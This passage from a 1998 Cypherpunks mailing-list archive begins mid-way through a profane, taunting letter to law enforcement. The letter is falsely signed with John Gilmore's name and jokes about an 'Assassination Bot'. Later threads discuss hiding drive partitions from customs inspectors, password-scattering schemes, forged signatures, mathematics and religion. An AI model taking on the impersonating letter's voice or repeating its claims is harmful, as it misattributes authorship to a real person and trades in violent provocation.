  I fully understand that this does not lessen the potential
of any LEA who gets a wild hair up their butt to throw a
mountain of taxpayer resources into prosecuting me and 
imprisoning me for their own professional/political gain.
  However, if you are performing actions so outrageously against
basic human rights and freedoms as to get me off of my lazy ass,
then I am the least of your problems, because there undoubtedly
are millions of people more functional than myself (who get out
of the house and go further than the liquor store) who are less
willing than myself to put up with increasingly heavy chains
placed around their hands and feet 'in the interests of national
security.'

  Feel free to have the Federales break down my door and
imprison me for pointing out the obvious. After all, I fit
the profile of a domestic terrorist--I quote the Constitution 
and the Bill of Rights, and I speak out against increasingly
big government.
  But remember...it's the quiet ones you've got to watch...
If you force everyone to 'be quiet', then you've got a world
of trouble on your hands.

Sincerly,
John Gilmore <gnu@toad.com>
~~~~~~~~~~~~~~~~~~~~~~~~~~~
p.s.
NOTICE TO LEA AGENTS IN NEED OF A CAREER BOOST!
  Yes, I'm just a troublemaking asshole, trying to get John
<spit> Gilmore <fart> in trouble.
  However, if you want to go to the trouble of tracking me 
down, I will give you some hints, since it seems likely that
anyone who has trouble finding a ton of cocaine at an 
airport might not be competent in CyberSpace, either.
  You might want to check with the Webmasters at the sites
quoted above to see who has accessed their web sites this
morning. The anonymous remailer I will be using is an open
secret to CypherPunks around the world as a really bad 
attempt at disguising my true MeatSpace identity. This alone
ought to be enough for some aggressive young LEA and/or
federal prosecutor to earn themself some brownie-points,
since I am a sorry enough son-of-a-bitch that they would not
have much trouble convicting me in front of a jury of 'their'
peers, assuming that they can make certain that I am not 
tried by a jury of my own peers.

Bonus Points:
  I can also be tied into Jim Bell's Worldwide Conspiracy to 
assassinate government authorities, through my implementation
of an Assassination Bot.
 (I am willing to 'rat out' Jim for two bottles of Scotch. If
 he is willing to rat _me_ out for less, then I guess it's
 just my hard luck, eh? <--that's another hint!)

p.p.s.
  You can also charge me with use of 'conventional' encryption
in the commission of a crime.
  Must be your lucky fucking day, eh?

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBNI24Hs5WpAclQcU1AQFaggP8CPTVy8EAY3JbIG94frc3C70MW0hUznmp
fRgBrq7m5tLGjX7fh3/s4fpTnQi+xUvRUroFETlR6KhM3srSy456wovpFlcLp7uc
xk31cRPEroFhO9NRVBUjzToCj78iDvdGm9QXUwLctbbohpdId/KKLTAUM6//4mCB
i/9oezfegWc=
=4/6E
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Mark Hahn <mhahn@tcbtech.com>
Date: Tue, 22 Sep 1998 08:03:31 +0800
To: cypherpunks@toad.com
Subject: Re: Stego-empty hard drives... (fwd)
In-Reply-To: <199809220116.UAA20070@einstein.ssz.com>
Message-ID: <3.0.1.32.19980922085457.0096f7a0@mail.aosi.com>
MIME-Version: 1.0
Content-Type: text/plain



At 11:37 PM 9/21/98 -0400, Lazlo Toth wrote:
>>> When you're taking your laptop through customs, you do
>>> nothing while the machine boots up, the doctored BIOS does its thing,
>>> and everybody's happy.  When you want to get at the stuff on the rest of
>>> the HD, you reboot and type in your passphrase.

As I recall, this thread is about customs officials booting your laptop
from *their* floppy and scanning your hard drive.  I suggest two
practical solutions to avoid this incursion:

1) Leave the floppy drive at home ;-) Many PCs have swapable floppy/
CD-ROM bays. I've learned to live without my floppy (others may not have
that option.)

2) If you can't leave your floppy at home, carry your sensitive data on 
a PCMCIA Type-II Hard Drive. Kingston sells one sporting 500MB 
of capacity. Pop it out and put it as far away from the laptop as you
can. Inside your other luggage somewhere.

-MpH
--------
Mark P. Hahn                    Work: 212-278-5861
mhahn@tcbtech.com               Home: 609-275-1834
TCB Technologies, Inc (mhahn@tcbtech.com)

Consultant to:
The SoGen Funds	1221 Avenue of the Americas, NY NY




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Mok-Kong Shen <mok-kong.shen@stud.uni-muenchen.de>
Date: Tue, 22 Sep 1998 01:59:00 +0800
To: cryptography@c2.net
Subject: Re: ArcotSign (was Re: Does security depend on hardware?)
In-Reply-To: <Pine.LNX.3.96.980921133001.20069A-100000@blackbox>
Message-ID: <36074AEB.63B74FA4@stud.uni-muenchen.de>
MIME-Version: 1.0
Content-Type: text/plain



bram wrote:
> 
> On Mon, 21 Sep 1998, Bruce Schneier wrote:
> 
> > Here's the basic idea:  Strew a million passwords on your hard drive, and
> > make it impossible to verify which is the correct one offline.  So, someone
> > who steals the password file off the client cannot run a cracking tool
> > against the file.
> 
> Is this really patentable? It sounds a *lot* like the original public-key
> algorithm (the one involving lots of little 'puzzles')

A question : How does the legitimate user find his password?
(Sorry for not having followed this thread from the beginning.)

M. K. Shen




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Mok-Kong Shen <mok-kong.shen@stud.uni-muenchen.de>
Date: Tue, 22 Sep 1998 02:40:59 +0800
To: Greg Broiles <gbroiles@netbox.com>
Subject: Re: ArcotSign (was Re: Does security depend on hardware?)
In-Reply-To: <Pine.BSF.4.02.9809212206150.11625-100000@ideath.parrhesia.com>
Message-ID: <36075008.AA35899E@stud.uni-muenchen.de>
MIME-Version: 1.0
Content-Type: text/plain



Greg Broiles wrote:

> I didn't understand the relationship between this scheme and Rivest's
> chaffing and winnowing which you note was cited as a reference in the SSC
> paper - would you (or someone else) mind explaining the connection? The
> closest I can get is thinking that there's a parallel between trying to
> guess which PIN in the SSC system is valid and which isn't, and the
> "winnowing" part of the Rivest protocol; but that doesn't seem like an
> especially meaningful or illuminating relationship. It looks like maybe a
> footnote was dropped, which would've tied the Rivest paper to a particular
> passage in the paper.

I like to mention that sometime ago there was a lot of discussions
in comp.security.pgp.discuss. My personal opinions on shaffing and 
winnowing are summarized in

    http://www.stud.uni-muenchen.de/~mok-kong.shen/#paper3

M. K. Shen




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Petro <petro@playboy.com>
Date: Tue, 22 Sep 1998 09:45:49 +0800
To: cypherpunks@einstein.ssz.com (Cypherpunks Distributed Remailer)
Subject: Re: atheism (was: RE: Democracy... (fwd)) (fwd)
In-Reply-To: <199809212348.SAA19564@einstein.ssz.com>
Message-ID: <v03110700b22d616217df@[206.189.103.244]>
MIME-Version: 1.0
Content-Type: text/plain



At 6:48 PM -0500 9/21/98, Jim Choate wrote:
>Forwarded message:
>
>> Date: Mon, 21 Sep 1998 15:18:28 +0000 (GMT)
>> From: attila <attila@hun.org>
>> Subject: Re: atheism (was: RE: Democracy... (fwd)) (fwd)
>
>>       father:	  so... you "deny" God's existence since their is no
>>       		  "proof" of His existence. did you ever consider
>>that in
>>       		  order to "deny" anything, you must have defined that
>>       		  concept?  in other words, to deny God, you must have
>>       		  determined that I or someone else has defined God in
>>       		  order for you to be able to "deny" God?
>
>So, what has the issue of defining something got to do with its existance?
>Is this bozo really claiming that God can only exist unless somebody thinks
>him up? Sounds like religous hubris to me...
>God was shinning on this asshole that he never had to argue face to face
>with me at that age...

	Basically he is saying you can't deny the existence of something if
you don't know what it is.

	God is a label on a definition. Change the definition, and you
could conceivably change wheter "God" falls into the "Exists", "Doesn't
Exist", or
"I donno" state.

>>       counselor:  is there a difference between belief and faith?
>The spelling.

>>       father:	  aethism is a concept which is almost impossible to
>>       		  define as it is a denial that if it could it doesnt.
>>       		  it is much easier to defend "agnosticism" where you
>>       		  admit you do not believe, or have faith, because you
>>       		  lack sufficient scientific proof. aethism is not
>>      		  doubting, it is denying, even in the face of proof.
>Agnosticism has *nothing* to do with scientific proof. It existed eons
>before anyone even thought of the scientific method. Skepticism is a part of
>human nature, not philosophy, beliefs, or science.
>Atheism is saying that while God could exist he doesn't. In other words it
>is the belief that God doesn't exist and can't be proven contrary. There is
>a fundamental belief that all proofs are flawed.

	There are some atheists who would argue that in this universe, God
(capital G, the Creator, Omni*, all good, Long white beard & sandals, god
of ...) could NOT exist.

>Agnosticism is the inability to believe one way or the other. It could be

	Or simply indecesion.

>> 		  suppose you die, and despite your lack of belief or
>> 		  faith, you find yourself before the throne of God.
>My own personal suspicion is he's going to ask you whether you lived your
>beliefs even in the face of overwhelming opposition. As long as you say
>"Yes" he's going to be a happy camper.
>To borrow a Christian icon, he's going to want to know if you worshiped
>false idols.

	He? Talk about hubris...

	Personally, I'm not an atheist any more, I'm a apathist. I don't
care whether God exists, or even what his characteristics are. I care how
whether each and every individual that affects my life acts responsibly and
fairly. Other than that, I could give a shit.

--
Five seconds later, I'm getting the upside of 15Kv across the nipples.
(These ambulance guys sure know how to party).
The Ideal we strive for: http://www.iinet.net.au/~bofh/bofh/bofh11.html
No, I don't speak for playboy, They wouldn't like that. They really wouldn't.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Petro <petro@playboy.com>
Date: Tue, 22 Sep 1998 09:45:22 +0800
To: cypherpunks@einstein.ssz.com (Cypherpunks Distributed Remailer)
Subject: Re: Stego-empty hard drives... (fwd)
In-Reply-To: <199809220116.UAA20070@einstein.ssz.com>
Message-ID: <v03110701b22d650af3bc@[206.189.103.244]>
MIME-Version: 1.0
Content-Type: text/plain



At 8:16 PM -0500 9/21/98, Jim Choate wrote:
>Forwarded message:
>> Date: Tue, 22 Sep 1998 00:46:03 +0000
>> From: Michael Hohensee <mah248@is9.nyu.edu>
>> I believe that the idea was to set it up so that BIOS defaults to
>> HD-hiding mode.
>
>How do you propose to do this? Via a BIOS setting?
>
>> When you're taking your laptop through customs, you do
>> nothing while the machine boots up, the doctored BIOS does its thing,
>> and everybody's happy.  When you want to get at the stuff on the rest of
>> the HD, you reboot and type in your passphrase.
>
>How do you propose to prompt the user for the correct time to type?

	Why prompt, you installed it, just have the startup stop at a
certain point, just simply pause. You hit a couple keys (4-8) and go on.
Given this case you don't really need the security of a long passphrase
since if they are looking to get in, you've lost already.

--
petro@playboy.com----for work related issues. I don't speak for Playboy.
petro@bounty.org-----for everthing else.      They wouldn't like that.
                                              They REALLY
Economic speech IS political speech.          wouldn't like that.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Petro <petro@playboy.com>
Date: Tue, 22 Sep 1998 09:45:26 +0800
To: Jim Choate <cypherpunks@einstein.ssz.com (Cypherpunks Distributed Remailer)
Subject: Re: Stego-empty hard drives... (fwd)
In-Reply-To: <199809220241.VAA20426@einstein.ssz.com>
Message-ID: <v03110702b22d66103122@[206.189.103.244]>
MIME-Version: 1.0
Content-Type: text/plain



At 9:41 PM -0500 9/21/98, Jim Choate wrote:
>Specificaly I am asking:
>
>Given a BIOS which has been modified to allow the end-user to select between
>encrypted and non-encrypted operation, how is the end-user supposed to
>make this selection?
>
>So far I've seen two suggestions:
>
>1.	The BIOS is only 'sensitive' at particular points in the POST.
>
>2.	The BIOS has a user-accessible selection via some method to
>	activate their selection.
>
>Both are workable, I'm looking for a more specific description of the
>methods.
>
>In the case of 1., is the marker going to be particular windows which are
>bounded by particular messages printed to the boot console? In the case of
>2. is it going to be a particular 'magic keystroke' that enables some hidden
>option screen?
>
>It seems to me that both have obvious methods of attack if the only goal is
>to demonstrate to a legal standard that such capability exists.

	If you do (1), and simply have _no_ prompt, just a small space in
time AFTER the POST (say, immediately after) to type in your passkey, and
things are
set up that if you type the wrong keys, it goes straight into hidden space
mode, then there would be no suspicion, other than a slightly long boot
sequence (and if the wait time were only 2 or 3 seconds, it might not even
be noticable.)

--
petro@playboy.com----for work related issues. I don't speak for Playboy.
petro@bounty.org-----for everthing else.      They wouldn't like that.
                                              They REALLY
Economic speech IS political speech.          wouldn't like that.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Duncan Frissell <frissell@panix.com>
Date: Tue, 22 Sep 1998 09:11:44 +0800
To: John Young <cypherpunks@cyberpass.net
Subject: Re: US Complaints in Embassy Bombings
In-Reply-To: <199809212005.QAA04784@camel14.mindspring.com>
Message-ID: <4.0.2.19980922095259.03e0ad50@panix.com>
MIME-Version: 1.0
Content-Type: text/plain



At 03:58 PM 9/21/98 -0400, John Young wrote:

>The place has a distinguished history. See its honor roll on
>Alta Vista. Search "Medical Facility for Federal Prisoners."

General Edwin Walker grabbed in the early 1960s for his opposition to
integration.  Classic "medical" imprisonment for political beliefs.

DCF




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jim Choate <ravage@einstein.ssz.com>
Date: Tue, 22 Sep 1998 09:30:01 +0800
To: cypherpunks@einstein.ssz.com (Cypherpunks Distributed Remailer)
Subject: Re: Peano Algebra and it's base theorem (fwd)
Message-ID: <199809221457.JAA03448@einstein.ssz.com>
MIME-Version: 1.0
Content-Type: text



Forwarded message:

> Date: Tue, 22 Sep 1998 10:02:23 -0500
> From: Mark Hahn <mhahn@tcbtech.com>
> Subject: Re: Peano Algebra and it's base theorem

> At 07:42 AM 9/22/98 -0500, Jim Choate wrote:
> >Peano Algebra's are based on the following:
> >
> >If a unary predicate P holds for 0, and if P holds, together with an element
> >x, also for it's succesor x', then P  holds for all natural numbers.
> 
> Didn't you over simplify this theorem somewhat.

It's taken word for word from VNR. Send 'em a letter.

The point is that we were discussing binary not integer mathematics.


    ____________________________________________________________________

                            The seeker is a finder.

                                     Ancient Persian Proverb

       The Armadillo Group       ,::////;::-.          James Choate
       Austin, Tx               /:'///// ``::>/|/      ravage@ssz.com
       www.ssz.com            .',  ||||    `/( e\      512-451-7087
                           -====~~mm-'`-```-mm --'-
    --------------------------------------------------------------------




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Petro <petro@playboy.com>
Date: Tue, 22 Sep 1998 10:03:42 +0800
To: Bruce Schneier <mok-kong.shen@stud.uni-muenchen.de>
Subject: Re: ArcotSign (was Re: Does security depend on hardware?)
In-Reply-To: <360797EF.A979141A@stud.uni-muenchen.de>
Message-ID: <v03110706b22d6a9a4210@[206.189.103.244]>
MIME-Version: 1.0
Content-Type: text/plain



At 7:39 AM -0500 9/22/98, Bruce Schneier wrote:
>At 02:28 PM 9/22/98 +0100, Mok-Kong Shen wrote:
>>Bruce Schneier wrote:
>>>
>>> At 02:20 PM 9/22/98 +0100, Mok-Kong Shen wrote:
>>
>>> >If the 'mathematical magic' is not to be kept secret (as in principle
>>> >shouldn't for all crypto algorithms) then presumably one could
>>> >attack through brute forcing the 'remembered secrect', I guess.
>>>
>>> Yes, but only through an on-line protocol.   And if the server has some
>>> kind of "turn the user off after ten bad password guesses," then the
>>> atack doesn't work.
>>
>>I remember someone wrote of the case where the attacker got the
>>file with the millions of passwords. Then if he also knows the
>>'mathematical magic' he could presumably do offline work. So I
>>suppose that the 'mathematical magic' has to be kept secret, which
>>would work against the generally accepted crypto principles.
>
>No.  The online protocol can be public.  Nothing has to be kept secret
>in order for this to work.  That would be stupid; we all know that.

	Also, that things are kept secret/unpublished NOW doesn't mean that
they won't be released when the product ships.

	Not knowing anything about this company, they may have seen a novel
way to put existing tools/methods together, and are doing Q/A, interface,
and marketing work, and don't want to publicize their methods _yet_ because
they COULD be beat to market by a product that has less
documentation/Testing/etc.

	If they seem willing to release the algorythm, and essential parts
of the source code, they might have at least a bit of a clue, if Mr.
Schneier is willing to bet reputation capital on it, I'd be hesitant to cry
"Snake oil". At least the first time.

--
petro@playboy.com----for work related issues. I don't speak for Playboy.
petro@bounty.org-----for everthing else.      They wouldn't like that.
                                              They REALLY
Economic speech IS political speech.          wouldn't like that.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jim Choate <ravage@einstein.ssz.com>
Date: Tue, 22 Sep 1998 09:31:52 +0800
To: cypherpunks@einstein.ssz.com (Cypherpunks Distributed Remailer)
Subject: Re: Stego-empty hard drives... (fwd)
Message-ID: <199809221500.KAA03503@einstein.ssz.com>
MIME-Version: 1.0
Content-Type: text



Forwarded message:

> Date: Tue, 22 Sep 1998 15:33:18 +0100
> From: Mok-Kong Shen <mok-kong.shen@stud.uni-muenchen.de>
> Subject: Re: Stego-empty hard drives... (fwd)

> 
> I am ignorant about hardware. Question: Wouldn't it be possible to
> somehow put information on a music CD?
> 

Absolutely, though the fact that it's r/w'able is going to set some flags
off. Now if you can find somebody who makes R/W CD's that aren't blue,
green, yellow, etc. and instead the clear that is normaly expected you might
pull it off.


    ____________________________________________________________________

                            The seeker is a finder.

                                     Ancient Persian Proverb

       The Armadillo Group       ,::////;::-.          James Choate
       Austin, Tx               /:'///// ``::>/|/      ravage@ssz.com
       www.ssz.com            .',  ||||    `/( e\      512-451-7087
                           -====~~mm-'`-```-mm --'-
    --------------------------------------------------------------------





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jim Choate <ravage@einstein.ssz.com>
Date: Tue, 22 Sep 1998 09:33:06 +0800
To: cypherpunks@einstein.ssz.com (Cypherpunks Distributed Remailer)
Subject: Re: Clinton's fake apologies (fwd)
Message-ID: <199809221501.KAA03547@einstein.ssz.com>
MIME-Version: 1.0
Content-Type: text



Forwarded message:

> Date: Tue, 22 Sep 1998 10:28:01 -0400
> From: Duncan Frissell <frissell@panix.com>
> Subject: Re: Clinton's fake apologies (fwd)

> Ladies and Gentlemen of the Jury, we just conducted a
> favorable/non-favorable public opinion survey about the ADA over there and
> found out that 3% had a favorable opinion of him 3% unfavorable and 94%
> were DK or No Opinion.  I therefore plead that he has insufficient personal
> popularity to conduct this prosecution.

I like that one, talk about 'jury of their peers'...


    ____________________________________________________________________

                            The seeker is a finder.

                                     Ancient Persian Proverb

       The Armadillo Group       ,::////;::-.          James Choate
       Austin, Tx               /:'///// ``::>/|/      ravage@ssz.com
       www.ssz.com            .',  ||||    `/( e\      512-451-7087
                           -====~~mm-'`-```-mm --'-
    --------------------------------------------------------------------




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Mark Hahn <mhahn@tcbtech.com>
Date: Tue, 22 Sep 1998 09:04:51 +0800
To: Jim Choate <cypherpunks@einstein.ssz.com
Subject: Re: Peano Algebra and it's base theorem
In-Reply-To: <199809221242.HAA02351@einstein.ssz.com>
Message-ID: <3.0.1.32.19980922100223.0095a100@mail.aosi.com>
MIME-Version: 1.0
Content-Type: text/plain



At 07:42 AM 9/22/98 -0500, Jim Choate wrote:
>Peano Algebra's are based on the following:
>
>If a unary predicate P holds for 0, and if P holds, together with an element
>x, also for it's succesor x', then P  holds for all natural numbers.

Didn't you over simplify this theorem somewhat. The proof that P holds
for the successor x' must be derived from the truth of predicate P for x.
The successor, x', must be shown to satisfy P because x satisfies P.
Restated: x' satisfies P if and only if x satisfies P. 

In this way you can start with P and the natural number 1, and 
show P holds for any natural number by applying your proof recursively. 
(i.e. P is true for 1 and my proof show it is true for 2, then my proof shows
it is true for 3, then it shows its true for 4, the it shows its true for
....)

If the proof of P for x' is not related to the proof of P for x then
you can prove lots of irrational statements. I.e. say the Predicate P is
"is prime". Then 2 holds for P (2 "is prime"). 2's successor is 3. P also
holds for 3 (3 "is prime"). So all P holds for all natural numbers. Ergo,
all natural number are prime. I don't think so. 3's primeness must be
derived from 2's primeness. 

-MpH
--------
Mark P. Hahn                    Work: 212-278-5861
mhahn@tcbtech.com               Home: 609-275-1834
TCB Technologies, Inc (mhahn@tcbtech.com)

Consultant to:
The SoGen Funds	1221 Avenue of the Americas, NY NY




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jim Choate <ravage@einstein.ssz.com>
Date: Tue, 22 Sep 1998 09:37:10 +0800
To: cypherpunks@einstein.ssz.com (Cypherpunks Distributed Remailer)
Subject: Re: Stego-empty hard drives... (fwd)
Message-ID: <199809221504.KAA03594@einstein.ssz.com>
MIME-Version: 1.0
Content-Type: text



Forwarded message:

> Date: Wed, 23 Sep 1998 00:01:31 +1000
> From: Reeza! <howree@cable.navy.mil>
> Subject: Re: Stego-empty hard drives... (fwd)

> At 07:45 AM 9/22/98 -0500, Jim Choate wrote:
> >Forwarded message:
> >> From: "Neels Kriek" <kriek@bigfoot.com>
> >> Subject: Re: Stego-empty hard drives... (fwd)
> >> Date: Tue, 22 Sep 1998 01:52:03 -0500
> >> I have bee using Encrypted magic Folders for a while now.  it gives you the
> >> option of encrypting all files in a specific folder. it can also do file
> >> name scrambling and even hide all the files in a directory from the OS.
> >> 
> >> It activates through a hot key combination.  You work on the files you want
> >> and when you exit emf the whole dir is hidden again.  probably not the most
> >> secure system but it will certainly fool most them if you disable booting
> >> from a stiffy/floppy.
> >
> >The problem is this approach is detectible with a suitable 'virus scanner'
> >technology. Even if the encrypted folders and such don't appear in the file
> >system you have various other pieces of the processing agent that must sit
> >around on the drive and hence are open to signature attacks.
> >
> 
> The first assertion is not entirely accurate-

Which first assertion, his or mine? Youre quoting leaves me confused (not
that it is necessarily your fault...;).

> I played with Magic Folders
> for a while- it relies on a command, usu. in the autoexec.bat or win.ini
> file (dos/windows environment) to load, with a bootable floppy disk these
> commands would would be bypassed and the so-called "hidden" folder is in
> plain sight. 

One thing is clear, you can't mundge the base OS or else the catch is going
to be trivial.


    ____________________________________________________________________

                            The seeker is a finder.

                                     Ancient Persian Proverb

       The Armadillo Group       ,::////;::-.          James Choate
       Austin, Tx               /:'///// ``::>/|/      ravage@ssz.com
       www.ssz.com            .',  ||||    `/( e\      512-451-7087
                           -====~~mm-'`-```-mm --'-
    --------------------------------------------------------------------




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jim Choate <ravage@einstein.ssz.com>
Date: Tue, 22 Sep 1998 09:36:59 +0800
To: cypherpunks@einstein.ssz.com (Cypherpunks Distributed Remailer)
Subject: Re: Stego-empty hard drives... (fwd)
Message-ID: <199809221505.KAA03644@einstein.ssz.com>
MIME-Version: 1.0
Content-Type: text



Forwarded message:

> Date: Tue, 22 Sep 1998 08:54:57 -0500
> From: Mark Hahn <mhahn@tcbtech.com>
> Subject: Re: Stego-empty hard drives... (fwd)

> As I recall, this thread is about customs officials booting your laptop
> from *their* floppy and scanning your hard drive.  I suggest two
> practical solutions to avoid this incursion:

That's where we started, we're miles away and deep in the woods now....


    ____________________________________________________________________

                            The seeker is a finder.

                                     Ancient Persian Proverb

       The Armadillo Group       ,::////;::-.          James Choate
       Austin, Tx               /:'///// ``::>/|/      ravage@ssz.com
       www.ssz.com            .',  ||||    `/( e\      512-451-7087
                           -====~~mm-'`-```-mm --'-
    --------------------------------------------------------------------




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Duncan Frissell <frissell@panix.com>
Date: Tue, 22 Sep 1998 09:22:54 +0800
To: Jim Choate <cypherpunks@einstein.ssz.com (Cypherpunks Distributed Remailer)
Subject: Re: Clinton's fake apologies (fwd)
In-Reply-To: <199809212328.SAA19426@einstein.ssz.com>
Message-ID: <199809221423.KAA24348@mail1.panix.com>
MIME-Version: 1.0
Content-Type: text/plain



At 06:28 PM 9/21/98 -0500, Jim Choate wrote:

>"But ladies and gentlemen of the jury, as our President has claimed and
>clearly demonstrated by his remaining in office, for a person to be
>convicted on a felony it has to be an important felony. The prosecution
has not
>proven that this felony has sufficient weight for prosecution. You have no
>choice but to aquit my client."
>
Or:

Ladies and Gentlemen of the Jury, we just conducted a
favorable/non-favorable public opinion survey about the ADA over there and
found out that 3% had a favorable opinion of him 3% unfavorable and 94%
were DK or No Opinion.  I therefore plead that he has insufficient personal
popularity to conduct this prosecution.

DCF




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jim Choate <ravage@einstein.ssz.com>
Date: Tue, 22 Sep 1998 10:11:39 +0800
To: cypherpunks@einstein.ssz.com (Cypherpunks Distributed Remailer)
Subject: CHALLENGE response (fwd)
Message-ID: <199809221539.KAA04070@einstein.ssz.com>
MIME-Version: 1.0
Content-Type: text



> Subject: CHALLENGE response (fwd)

> The whole point of the CHALLENGE response went straight over his head,
> didn't it? 

It didn't go over my head at all. What amazes me is that it took you this
long to figure out that one could munge signatures.

> We have here the first known case where a key was constructed ex post
> facto to validate a signed message, in response to Adam Back's challenge.

Um, I don't believe that is true. It may be the first time members of this
list have managed it.

> No longer can you assume that just because you posted a signed message
> on a certain date, and you hold the public key which signed that message,
> that you can later prove authorship.  It challenges some of the implicit
> assumptions which have been made in using public key cryptography.

No, it challenges basic assumptions regarding the importance of identity.
In no way does it effect the basic math of crypto, public or otherwise.

And people wonder why I don't sign my messages...

> And all Jim Choate can do is take issue with a snippet of Toto's ravings
> which were included purely to illustrate the signature validity.  He is
> completely unaware of what is really happening.

I've taken no issue with Toto or his ravings.

Have a nice day.


    ____________________________________________________________________

                            The seeker is a finder.

                                     Ancient Persian Proverb

       The Armadillo Group       ,::////;::-.          James Choate
       Austin, Tx               /:'///// ``::>/|/      ravage@ssz.com
       www.ssz.com            .',  ||||    `/( e\      512-451-7087
                           -====~~mm-'`-```-mm --'-
    --------------------------------------------------------------------




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jim Choate <ravage@einstein.ssz.com>
Date: Tue, 22 Sep 1998 10:18:45 +0800
To: cypherpunks@einstein.ssz.com (Cypherpunks Distributed Remailer)
Subject: Re: Stego-empty hard drives... (fwd)
Message-ID: <199809221546.KAA04142@einstein.ssz.com>
MIME-Version: 1.0
Content-Type: text



Forwarded message:

> Date: Tue, 22 Sep 1998 09:38:18 -0500
> From: Petro <petro@playboy.com>
> Subject: Re: Stego-empty hard drives... (fwd)

> 	If you do (1), and simply have _no_ prompt, just a small space in
> time AFTER the POST (say, immediately after) to type in your passkey, and
> things are
> set up that if you type the wrong keys, it goes straight into hidden space
> mode, then there would be no suspicion, other than a slightly long boot
> sequence (and if the wait time were only 2 or 3 seconds, it might not even
> be noticable.)

If we are discussing only the customs inspector doing a visual inspection
this will certainly work. It won't hold up to TEMPEST analysis where they 
fingerprint a known un-mod'ed unit and then compare that to yours. The
POST shouldn't change from laptop to laptop, irrespective of the filesystem
or OS that is actualy installed.

The point is that this is a weak approach with a variety of attacks open.
When one considers the amount of work required to collect BIOS'ed , reverse
engineer them (unless you got lots of mullah), develop the crypto,
develop the camouflage code, distribute the code, burn the ROM's, distribute
the ROM's, cost of suitable TEMPEST monitors, etc. the benefit seems
questionable at best.

Even if they can't crack it in may places (eg France) such actions would
be prosecutable in and of themselves.


    ____________________________________________________________________

                            The seeker is a finder.

                                     Ancient Persian Proverb

       The Armadillo Group       ,::////;::-.          James Choate
       Austin, Tx               /:'///// ``::>/|/      ravage@ssz.com
       www.ssz.com            .',  ||||    `/( e\      512-451-7087
                           -====~~mm-'`-```-mm --'-
    --------------------------------------------------------------------




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jim Choate <ravage@einstein.ssz.com>
Date: Tue, 22 Sep 1998 10:20:10 +0800
To: cypherpunks@einstein.ssz.com (Cypherpunks Distributed Remailer)
Subject: Re: Stego-empty hard drives... (fwd)
Message-ID: <199809221548.KAA04187@einstein.ssz.com>
MIME-Version: 1.0
Content-Type: text



Forwarded message:

> Date: Tue, 22 Sep 1998 09:32:49 -0500
> From: Petro <petro@playboy.com>
> Subject: Re: Stego-empty hard drives... (fwd)

> 	Why prompt, you installed it, just have the startup stop at a
> certain point, just simply pause. You hit a couple keys (4-8) and go on.
> Given this case you don't really need the security of a long passphrase
> since if they are looking to get in, you've lost already.

You'll probably not want it to stop, simpy wait a few seconds. Also, if
the passphrase is incorrect you'll not want to issue any error messages.

Stopping the boot may be a good indication of a problem.


    ____________________________________________________________________

                            The seeker is a finder.

                                     Ancient Persian Proverb

       The Armadillo Group       ,::////;::-.          James Choate
       Austin, Tx               /:'///// ``::>/|/      ravage@ssz.com
       www.ssz.com            .',  ||||    `/( e\      512-451-7087
                           -====~~mm-'`-```-mm --'-
    --------------------------------------------------------------------




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jim Choate <ravage@einstein.ssz.com>
Date: Tue, 22 Sep 1998 10:23:07 +0800
To: cypherpunks@einstein.ssz.com (Cypherpunks Distributed Remailer)
Subject: Re: atheism (was: RE: Democracy... (fwd)) (fwd)
Message-ID: <199809221551.KAA04243@einstein.ssz.com>
MIME-Version: 1.0
Content-Type: text



Forwarded message:

> Date: Tue, 22 Sep 1998 09:27:57 -0500
> From: Petro <petro@playboy.com>
> Subject: Re: atheism (was: RE: Democracy... (fwd)) (fwd)

> 	Basically he is saying you can't deny the existence of something if
> you don't know what it is.

That's the rub, in transcendental religions with this as a proviso it
becomes impossible to even talk about God, he transcends the natural world
and escapes any hope of comprehension other than a simple label.

In effect transcendental religions have defined themselves into a circle.

They define God as something undefinable and then claim that anyone who
counters their beliefs is at fault because they can't define God.



    ____________________________________________________________________

                            The seeker is a finder.

                                     Ancient Persian Proverb

       The Armadillo Group       ,::////;::-.          James Choate
       Austin, Tx               /:'///// ``::>/|/      ravage@ssz.com
       www.ssz.com            .',  ||||    `/( e\      512-451-7087
                           -====~~mm-'`-```-mm --'-
    --------------------------------------------------------------------




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Steve Mynott <stevem@tightrope.demon.co.uk>
Date: Tue, 22 Sep 1998 05:02:26 +0800
To: cypherpunks <cypherpunks@cyberpass.net>
Subject: problems with pgp 5i for solaris
Message-ID: <19980922110059.A20392@tightrope.demon.co.uk>
MIME-Version: 1.0
Content-Type: text/plain



I am having problems with PGP 5i for solaris.

I am aware of http://www.pgpi.com/bugs/bugs50i.shtml

I have tried setting HAVE64 to 0 and the 
*** src/lib/pgp/include/pgpUsuals.h~    Sat Aug  9 22:44:58 1997
--- src/lib/pgp/include/pgpUsuals.h     Tue Aug 12 16:57:16 1997

patch but neither solve my problem.

I get "Received signal 10." after entering my pass phrase when
trying to decrypt a message encoded to my PK.

Has anyone got it to work?

-- 
pgp 1024/D9C69DF9 1997/10/14 steve mynott <steve@tightrope.demon.co.uk>




